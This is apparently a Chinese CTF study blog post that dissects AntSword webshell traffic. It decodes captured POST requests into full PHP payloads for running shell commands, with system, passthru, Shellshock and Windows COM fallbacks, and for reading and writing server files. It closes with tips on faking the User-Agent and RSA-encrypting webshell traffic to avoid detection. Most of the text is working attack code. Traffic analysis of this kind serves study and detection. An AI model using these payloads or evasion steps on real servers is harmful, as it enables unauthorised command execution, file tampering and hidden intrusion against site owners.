c5980976ee6af=&cmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2201fba%22%3Becho%20%40asenc(%24output)%3Becho%20%2278e6dcac%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(%24_POST%5B%22mbd5f87b32df2b%22%5D)%3B%24s%3Dbase64_decode(%24_POST%5B%22dd32c0973cea1a%22%5D)%3B%24envstr%3D%40base64_decode(%24_POST%5B%22c5980976ee6af%22%5D)%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&dd32c0973cea1a=Y2QgIi92YXIvd3d3L2h0bWwiO2xzO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXQ%3D%3D&mbd5f87b32df2b=L2Jpbi9zaA%3D%3D

url解码,格式化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
c5980976ee6af=
cmd=
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){
return $out;
};
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "01fba";
echo @asenc($output);
echo "78e6dcac";
}
ob_start();
try{
$p=base64_decode($_POST["mbd5f87b32df2b"]);
$s=base64_decode($_POST["dd32c0973cea1a"]);
$envstr=@base64_decode($_POST["c5980976ee6af"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
if(substr($d,0,1)=="/"){
@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
}else{
@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;")
}
if(!empty($envstr)){
$envarr=explode("|||asline|||", $envstr);
foreach($envarr as $v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
$r="{$p} {$c}";
function fe($f){
$d=explode(",",@ini_get("disable_functions"));
if(empty($d)){
$d=array();
} else{
$d=array_map('trim',array_map('strtolower',$d));
}
return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
};
function runshellshock($d, $c) {
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("a@127.0.0.1", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
}
;
function runcmd($c){
$ret=0;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')){
@system($c,$ret);
} elseif(fe('passthru')){
@passthru($c,$ret);
} elseif(fe('shell_exec')){
print(@shell_exec($c));
} elseif(fe('exec')){
@exec($c,$o,$ret);
print(join("",$o));
} elseif(fe('popen')){
$fp=@popen($c,'r');
while(!@feof($fp)){
print(@fgets($fp,2048));
}
@pclose($fp);
} elseif(fe('proc_open')){
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while(!@feof($io[1])){
print(@fgets($io[1],2048));
}
while(!@feof($io[2])){
print(@fgets($io[2],2048));
}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);
} elseif(fe('antsystem')){
@antsystem($c);
} elseif(runshellshock($d, $c)) {
return $ret;
} elseif(substr($d,0,1)!="/" && @class_exists("COM")){
$w=new COM('WScript.shell');
$e=$w->exec($c);
$so=$e->StdOut();
$ret.=$so->ReadAll();
$se=$e->StdErr();
$ret.=$se->ReadAll();
print($ret);
} else{
$ret = 127;
}
return $ret;
};
$ret=@runcmd($r." 2>&1");
print ($ret!=0)?"ret={$ret}":"";
;
}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
};
asoutput();
die();
dd32c0973cea1a=Y2QgIi92YXIvd3d3L2h0bWwiO2xzO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXQ==
# cd "/var/www/html";ls;echo [S];pwd;echo [E]
mbd5f87b32df2b=L2Jpbi9zaA==
# /bin/sh

大概就是利用bash运行,然后返回结果,实在是太长了。。。

文件管理

读取文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
cmd=
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){
return $out;
};
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "79dfaa6a";
echo @asenc($output);
echo "6befcf28f0f8";
}
ob_start();
try{
$F=base64_decode($_POST["xcb1bd75c217ce"]);
$P=@fopen($F,"r");#打开文件
echo(@fread($P,filesize($F)?filesize($F):4096));#读文件,不清楚大小就读4MB,输出到缓存区
@fclose($P);;
}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
};
asoutput();
die();
xcb1bd75c217ce=L3Zhci93d3cvaHRtbC9pbmRleC5waHA=
#/var/www/html/index.php

新建文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
cmd=
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){
return $out;
};
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "4e2d44f";
echo @asenc($output);
echo "e9188218b";
}
ob_start();
try{
echo @fwrite(fopen(base64_decode($_POST["xcb1bd75c217ce"]),"w"),base64_decode($_POST["rc3235e6b73a85"]))?"1":"0";
# 大概是打开文件,写入Halo AntSword!
;}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
};
asoutput();
die();
rc3235e6b73a85=I0hhbG8gQW50U3dvcmQh
#Halo AntSword!
xcb1bd75c217ce=L3Zhci93d3cvaHRtbC90ZXN0LnR4dA==
#/var/www/html/test.txt

写入文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){
return $out;
}
;
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "f9e3e350bf";
echo @asenc($output);
echo "3721032877";
}
ob_start();
try{
echo @fwrite(fopen(base64_decode($_POST["oa037d12e7ff1b"]),"w"),base64_decode($_POST["oa5bfdf2210f2e"]))?"1":"0";
;
#就是将数据写到文件
}
catch(Exception $e){
echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
oa037d12e7ff1b=L3Zhci93d3cvaHRtbC90ZXN0LnR4dA==
#/var/www/html/test.txt
oa5bfdf2210f2e=dGVzdA==
#test

优化

更改UA头

E:\ctf\CTFTOOLS\web\antSword\antSword-2.1.8.1\modules\request.js
中改

// 请求UA
const USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0';

RSA加密流量

利用自带的RSA编码器,生成公钥私钥,将生成的php上传到服务器,蚁剑将编码器改为rsa后重新连接

1
ant=la3KN%2BFosCL%2BwV8SoqFXbjysNZv3Pipg13BSNrtfHRoaXkGJAhLoO2OXtO%2Bu47K87url5Sl6fH%2FtQmjw2sb%2B9kRhIrFxK5bZkOW9BBGtCvNh54n6rCVLeRXDWxkrYhtGuXHZANxxLpJ0%2BKTeThGLCKosfWHbTRn1dJlHy95qLoY%3D%7CxfdFU25cqoWX6%2FkpRLK%2FdOGrWws1NSnArRYMhW3MSRVil2nDp6pkcDLGSwkM1D1hL09kzqZQagSYN37sH%2FMymehinfsD5gGIZJUANmf17X%2BjbS0zObtl68%2FVCmUpvL5stF7mXU6LgdTY2VFvhb2rmuAHm2PcR6ulWBvZxgJoc8U%3D%7Cos9zBh%2FkldShM88wE7jD20L%2BorzmNz%2B%2BFpb8sZbCQWhwtAyrdCux9NIKegA%2FGf6UfZDXWF974NHNo%2BeKrUsid4lw%2BcoEu0ISLD%2FezteTHeBHAwZjPblBwHb7dU6C7Rt8%2F6DwX3MbJxXwcVb1mplukykpCGSG%2BV9X2ipWrac2NcM%3D%7Cx5tBL8n39xfH2LDI3tiug%2F0xbrA9sualN32DxTWc1DS3daqd0Zk%2BOptNFLYblMK89gzDmDYodgY0rs%2FCoQ6s9SD4R%2BXVo8hmI%2FsiGTbKc64HtrVld0xRmkYKanZZuBYu7fUYXWEt35%2FlI5916YZlV3Kk81jXrXCxoRhzUzQ%2B0c8%3D%7CfHn6ZNFKKeKI7GyN7fiod75nffVYYJZ4GEVsdYnMOAEw6Ds45RbIm64Xz5KGZb%2B8K%2FUUSbm%2B0GaSAEWKMzvdGicdAh%2BW7QpG8YnvKEJ1QbyB7xF6Ncba4TGX5iL3e0lNF8rZLUXlkw7NLSi3KN5HZecXlUQ0gD1OqoQ%2BR3VzIYg%3D%7Cjw7awkFmEOao3qxJNOLAO5PyBdyCympc7KDUIs7rrKnJzRhqSUHVffZdyoSglh37qBzr0g3MM3W33wxwq4BnMUtaIJHsnLrashxQjdKxLPB1RuOYjKorLYI5NcWxl6WunTrMf2c%2FMcV%2F5OU8dtQoSkEmRlh9W%2F8ljK2KHc2q3c4%3D%7Ctx6yz2bhEQ8v7E6blADNV2KGVhSXaU484aHodI1Es15yFHlaFRAs6NPCDfArzD%2Byj%2FZtvs%2F%2FItIbZG7mvlQnrQmSqeK5JrLoKcDVSxsuJnS5fZteBt9z1cZv%2BNm5JfPwTIIVZk7OZhXULD6%2Fy3UZIDNAYqzftQAfLzsLjSvWR0U%3D%7CKvLYMP7S3qkOwjv8JX6Es1EJIj8IUgkzwvfQza8j88sYPLM8IZ1fuDM6efkIYW%2BYzI1Pdkv05asoIcVo4wnvFxIxK286gqNgx8c6BWJ96yhrglrHP9YwUzcEhBSrb3Anjc4gsm3cwKhgEpYwcFzpex2DYp5AsRK2p4w%2FvzyGPoI%3D%7CosyGM9%2BgL45wtui9oYPhJHb2to%2BowQnyL5Lbu5t2vODSk3O6wa1yLLjmBNTQQpeJvmm%2BBYzKGi3AHptab0DXbkmEtbh2aBWF2L5RJb%2Bqem487zbaylCb%2BN2ckSED47zmPgZ8Tr00jkR%2Fr82oEEV1ToJ6T7zO%2BMzPe3hAG0jbPE4%3D

可以看到数据已经被加密了

参考

https://www.freebuf.com/articles/web/264896.html
https://zhuanlan.zhihu.com/p/369496846